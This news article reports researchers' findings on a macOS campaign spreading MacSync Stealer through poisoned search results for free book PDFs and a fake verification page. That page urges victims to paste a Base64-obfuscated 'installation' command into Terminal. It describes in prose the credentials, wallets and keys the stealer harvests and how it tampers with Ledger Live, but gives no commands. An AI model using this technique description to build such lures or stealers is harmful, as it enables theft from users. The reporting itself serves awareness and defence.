SEO Poisoning and “ClickFix” Tactics: The Rise of MacSync Stealer

A sophisticated new macOS malware delivery chain is targeting users through a blend of high-ranking search results and clever social engineering. Researchers at CloudSEK have identified a campaign distributing MacSync Stealer, a potent information-thief designed to strip Apple users of their digital identities and financial assets.

The campaign leverages SEO poisoning to place malicious links at the top of Google search results. Attackers specifically target users looking for free PDF versions of popular professional books, such as “Inspired: How To Create Products Customers Love”.

“The campaign begins with malicious search results targeting users attempting to download PDF versions of popular books,” the researchers explains. When a user clicks the link, they aren’t given a document. Instead, they are redirected to a fake “human verification” page featuring a countdown timer and a button to prove they aren’t a robot.

Once the victim clicks the verification button, they are presented with a macOS-themed instruction page. Under the guise of fixing a “download issue,” the site provides a “Quick Installation” command to be pasted into the Mac Terminal.

This command uses a clever trick: it starts with a legitimate-looking link to apps.apple.com to lower the victim’s guard. However, “the real behavior is hidden inside the Base64-encoded string”. Once executed, this string silently pulls a remote script from attacker-controlled infrastructure and pipes it directly into the system’s command processor.

MacSync is a highly efficient “loader” that runs silently in the background. Its primary goal is the total harvest of sensitive data. Within seconds of execution, it begins:

• Stealing Credentials: It targets Chromium-based browsers (Chrome, Brave, Edge, Opera) and Firefox to extract login data, active session cookies, and autofill information.
• Targeting Crypto Wallets: The malware scans for dozens of browser-based wallet extensions and directly copies desktop wallet directories for Exodus, Electrum, Atomic, and more.
• Harvesting System Keys: It reaches deep into the system to grab macOS Keychains, SSH keys, AWS credentials, and Kubernetes configurations.
• Targeted File Grabbing: It automatically searches the Desktop, Documents, and Downloads folders for files with sensitive extensions like .wallet, .key, .seed, and .pem.

To ensure success, the malware even uses a fake system dialog. If it cannot find a saved password, it prompts the user to “enter password to continue” using a window that mimics official System Preferences.

Perhaps the most alarming discovery is the malware’s interest in Ledger Live. If the application is detected on the Mac, the malware downloads attacker-controlled files to replace internal application components like app.asar and Info.plist.

“The additional tampering of cryptocurrency wallet software indicates that the objective extends beyond credential theft toward financial persistence and transaction manipulation,” CloudSEK researchers warned.

In reality, the compromise is already complete.